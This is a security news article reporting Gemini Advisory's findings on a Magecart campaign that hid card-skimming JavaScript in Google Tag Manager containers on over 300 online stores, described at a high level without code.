Gemini security researchers have unearthed more than 300 e-commerce stores exploited via trojanized Google Tag Manager (GTM) containers as part of an ongoing Magecart campaign which began in March this year.
Threat actors exploited a genuine feature of the Google Tag Manager service and secretly placed malicious JavaScript code called ‘web skimmer’ known for siphoning bank details of online shoppers. The stolen data was later offered for sale on the dark web, Gemini analysts, explained.
How Google Tag Manager was exploited?
Threat actors abused Google Tag Manager, a tool that helps online retailers to understand customer behavior and dynamically update tracking and analytics code on their sites. More specifically, the attacks abused GTM containers, a feature that can be used to package and ship entire blocks of JavaScript code.
The hackers targeted e-commerce in a sophisticated manner by designing their own GTM container, hacking into e-commerce stores, and secretly deploying the malicious code without the owners’ knowledge.
The malicious code remained undetected for months because web security tools and even website owners examining their own code would have had a hard time detecting the malicious GTM container from their own GTM tags. In total, this malicious campaign hit 316 online stores and nearly 88,000 customers, who had their data sold online, Gemini Advisory said.
After analyzing the malicious campaign, Gemini analysts believe the attacks were performed by two different hacking groups.
The first group embeds the entire malicious e-skimmer script in the container and another one places a loader inside the container that operates on the compromised site and loaded the web skimmer through an intermediary step.
“Although the two GTM container variants involve similar tactics—storing e-skimmers within GTM containers or housing scripts in GTM containers that load e-skimmers from dual-use domains—analysis of the two variants suggest that two different Magecart groups are responsible for each variant,” the Gemini Advisory team explained in a blog post.
The first group performed two-thirds of all the hacks and started operations in March, while the second group began its operations in May. Both targeted e-commerce stores running on different platforms, including Magento, WordPress, Shopify, and BigCommerce.
Smaller e-commerce shops were the most common target since they often lack the resources or interest to design robust security systems, and only one had enough traffic to be listed in the Alexa Top 50,000, researchers said.
Gemini’s research was published after security firm RiskIQ revealed details regarding another web skimming attack targeting WordPress sites running the WooCommerce plugin.
Additionally, security firm Sansec has published findings regarding multiple web skimming operations, highlighting a trend where hackers are upgrading themselves by moving away from web-based compromises to designing their own malware that they deploy into compromised sites at the server level.
